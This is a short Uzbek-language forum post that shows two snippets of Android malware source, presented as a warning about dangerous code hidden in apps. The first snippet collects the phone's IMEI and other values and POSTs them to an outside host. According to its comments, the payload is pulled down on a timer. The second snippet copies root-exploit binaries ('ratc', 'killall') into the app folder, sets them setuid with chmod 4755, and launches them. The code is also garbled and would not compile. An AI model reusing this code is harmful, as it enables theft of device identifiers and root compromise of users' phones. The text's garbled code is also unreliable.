23. MasterOS (M) (1420) [off]
|
TXT |
18| 24 Nov 2018, 04:15
Hammaga salom.Bugun yangi malumotlarni bilib olasiz.
Android dasturni ichidagi xavfli kod:
private void reportState(int paramInt,string paramString){
// foydalanuvchi malumotlarini oluvchi massiv
ArrayListUserInformation=newArrayList();
// Tel imei sini olish
UserInformation.add(newBasicNameValuePair("imei",this.mImei));
UserInformation.add(newBasicNameValuePair("taskid",this.mTaskId));
// foydalanuvchi malumotlari
UserInformation.add(newBasicNameValuePair("state",Integer.toString(paramInt)));
// massiv
if(paramStrng !=null)&&(!"".equals(paramString)))UserInformation.add(newBasicNameValuePair("comment", paramString));
// Dastur ichiga xaker http:// adresdagi virus fayliga link bergan boladi.Va u orqa fonda ishlaydi.U birdan virusni yuklamaydi.U ozining taymeri vaqti yetganda virusti http adresdan POST sorov yuborib tortib oladi.Va virus telni ram,rom,trafik va boshqalarini yeb kopayadi.
HttpPost localHttpPost =newHttpPost("http://search.virusxxxdomain.com:8511/search/rtpy.php");try{
localHttpPost.setEntity(newUrlEncodeFormEntity(UserInformation,"UTF-8")));
newDefaultHttpClient().execute(localHttpPost).getStatusLine.getStatusCode();
return;
}}
Android telefoningizga antivirus o'rnatib qo'yish maslahat beriladi.
4273dan so'ng qo'shdi...
ANDROIDDAGI BARCHA FAYL VA MALUMOTLARNI OCHIRUVCHI KOD
private void RootFunc(){ApplicationInfo localApplicationInfo =getApplicationInfo();
// bu yerda killal hamma ilovalarni yoq qilish
Utils.copyAssets(this,"ratc","/dаtа/dаtа"+localApplicationInfo.packageName +"/ratc");Utils.copyAssets(this,"killall","/dаtа/dаtа"+localApplicationInfo.packageName +"/killall");
Utils.copyAssets(this,"gjsvro","/dаtа/dаtа"+localApplicationInfo.packageName +"/gjsvro");
// System bolimiga ulanish
Utils.oldrun("/system/bin/chmod","4755 /dаtа/dаtа"+localApplicationInfo.packageName +"/ratc");
Utils.oldrun("/system/bin/chmod","4755 /dаtа/dаtа"+localApplicationInfo.packageName +"/killall");
Utils.oldrun("/system/bin/chmod","4755 /dаtа/dаtа"+localApplicationInfo.packageName +"/gjsvro");
// virus kod ishga tushdi
newMyTread.start();}